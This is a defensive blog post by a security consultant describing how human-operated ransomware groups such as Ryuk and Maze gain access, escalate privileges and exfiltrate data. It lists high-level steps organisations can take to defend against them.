How to defend against human-operated ransomware attacks

A growing threat to all organisations

Image for post
Image for post
NBC News article about the Ryuk ransomware attack on Universal Health Services

What are human-operated ransomware attacks?

Skilled cyber criminals gain access to organisations networks, before extorting victims into paying ransoms, by encrypting systems and threatening to leak sensitive data. Attacks typically take place over weeks or months, as attackers prepare to maximise the damage they can cause by compromising privileged accounts and gaining access to key systems. Well-known groups who carry out these types of attacks include Ryuk, REevil, Doppelpaymer and Maze.

How are these attacks carried out?

Gaining access

In most cases, ransomware attackers gain access to organisations’ networks by using “distribution networks”. These regularly send millions of untargeted phishing emails to organisations around the world (often disguised as overdue invoices, resumes, airline tickets), in an attempt to opportunistically compromise lucrative targets with malware, such as the banking trojans Emotet, Dridex and TrickBot. These emails use tried and tested ways to persuade employees to run malicious files, normally by asking users to enable macros in Microsoft Office documents.

Escalating privileges and compromising further systems

Attackers then perform reconnaissance and compromise privileged accounts and systems. Relying on tools and techniques more commonly associated with cyber criminal groups such as FIN6, nation-state actors and red teams.

Exfiltrating data and deploying ransomware

With those privileged accounts, attackers identify and exfiltrate sensitive data, before deploying ransomware to as many systems as they can — including across multiple domains by exploiting trust relationships.

Why these attacks represent an increasingly dangerous threat

The increasing scale, sophistication, and frequency make them an increasingly dangerous threat. Not to mention, the devastating impact on people, the livelihoods of employees and the responders’ mental health that is often understated and untold. When organisations are targeted that can not afford to protect themselves from these sophisticated and well resourced cyber criminal groups, the tole is especially unfair.

Image for post
Image for post
New York Times article on a ransomware attack suspected in a woman’s death

How to defend against these attacks?

Organisations should take a three-step approach to defend against these attacks:

Image for post
Image for post
Slide from our recent talk at the SANS Cyber Defence Summit on the three steps organisations should take to defend against these attacks.
Image for post
Image for post
Slide from our recent talk at the SANS Cyber Defence Summit on key cyber security capabilities to defend against these attacks.
  1. Remediate internet-facing vulnerabilities and reduce the attack surface
  2. Protect privileged accounts from being compromised
  3. Remediate common hygiene issues used by attackers to escalate privileges
  4. Restrict the ability of an attacker to compromise further systems
  5. Rapidly detect and contain incidents before they escalate
Image for post
Image for post
Actionable recommendations from Microsoft 365 Defender Threat Intelligence Team

Written by

Hi, my name is Will. I’m a cyber security consultant living in London. I help companies defend against cyber attacks. Opinions my own. Read more willoram.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store